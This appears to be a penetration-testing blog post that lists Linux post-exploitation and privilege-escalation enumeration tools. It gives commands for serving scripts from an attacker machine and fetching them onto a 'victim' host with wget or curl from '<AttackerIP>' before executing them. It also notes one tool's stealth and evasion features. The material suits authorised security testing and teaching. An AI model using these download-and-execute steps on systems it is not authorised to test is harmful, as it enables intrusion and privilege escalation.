Linux Automated Scripts

Introduction

In this blog post, we will discuss some tools for performing our post-exploitation process, and save our time and efforts.

Post Enumeration Scripts

LinEnum.sh

https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh

This script is used to perform Linux post enumeration/Local Linux enumeration and privilege escalation checks.

How to use?

You need to download it in the target machine using wget or curl.

You can also use python, php, ruby, or nc to start HTTP static web server.

Python

python -m SimpleHTTPServer 8080

python3 -m http.server 80

PHP

php -S localhost:80

Ruby

ruby -run -ehttpd . -p80

Netcat

while true ; do nc -l 80 < LinEnum.sh

Downloading using curl and wget

curl -x -o LinEnum.sh http://<AttackerIP>/LinEnum.sh

wget

wget http://<AttackerIP>/LinEnum.sh

chmod +x LinEnum.sh

./LinEnum.sh

And it will automate the post enumeration process and give the valuable result

Pspy

This tool monitor’s linux processes without root permissions

Download its binary in your attacker system, start the local server as before, and download it in the victim’s machine.

After download execute it and it will perform monitoring for you.

Linux exploit suggestor

https://github.com/InteliSecureLabs/Linux_Exploit_Suggester

Linux_Exploit_Suggester suggests exploits based on operating system release number, which helps the attacker to exploit the target.

Searchsploit We have discussed this tool in previous phases, it can also help us to check particular exploit for the target.

Kernelpop

https://github.com/spencerdodd/kernelpop

kernel privilege escalation enumeration and exploitation framework.

download it from the link above

$ cd kernelpop
$ python3 kernelpop.py

It will automate kernel vulnerability enumeration and exploitation

Bashark

Bashark aids pen-testers and security researchers during the post-exploitation phase of security audits. Usage

To launch Bashark on compromised host, simply source the bashark.sh script from the terminal: $ source bashark.sh Then type help to see Bashark’s help menu

Features

  • Single Bash script
  • Lightweight and fast
  • Multi-platform: Unix, OSX, Solaris, etc.
  • No external dependencies
  • Immune to heuristic and behavioral analysis
  • Built-in aliases of often used shell commands
  • Extends system shell with post-exploitation oriented functionalities
  • Stealthy, with custom cleanup routine activated on exit
  • Easily extensible (add new commands by creating Bash functions)
  • Full tab completion

wget https://raw.githubusercontent.com/TheSecondSun/Bashark/master/bashark.sh

and simply run it

chmod +x bashark.sh

./bashark.sh

Linuxprivchecker

Enumerates system configurations and check for privilege escalation

wget //www.securitysift.com/download/linuxprivchecker.py

python3 linuxprivchecker.py

linux-exploit-suggester-2

Linux_Exploit_Suggester-2 is the extended version of previous Linux_Exploit_Suggester used to find linux privilege escalation vulnerabilities in system.

git clone //github.com/jondonas/linux-exploit-suggester-2.git

cd linux-exploit-suggester-2

./linux-exploit-suggester-2.pl

BeRoot Privilege Escalation Project - Windows / Linux / Mac BeRoot Project is a post exploitation tool to check common misconfigurations to find a way to escalate our privilege. It has been added to the pupy project as a post exploitation module (so it will be executed in memory without touching the disk).

For now, we are using it for linux

Features of BeRoot:

  • Check Files Permissions

  • SUID bin

  • NFS root Squashing

  • Docker

  • Sudo rules

  • Kernel Exploit

wget https://raw.githubusercontent.com/AlessandroZ/BeRoot/master/Linux/beroot.py

chmod +x beroot.py

./beroot.py

Conclusion

We have discussed some automated scripts which can help us during post-exploitation. I suggest to check them in your system to know about their work.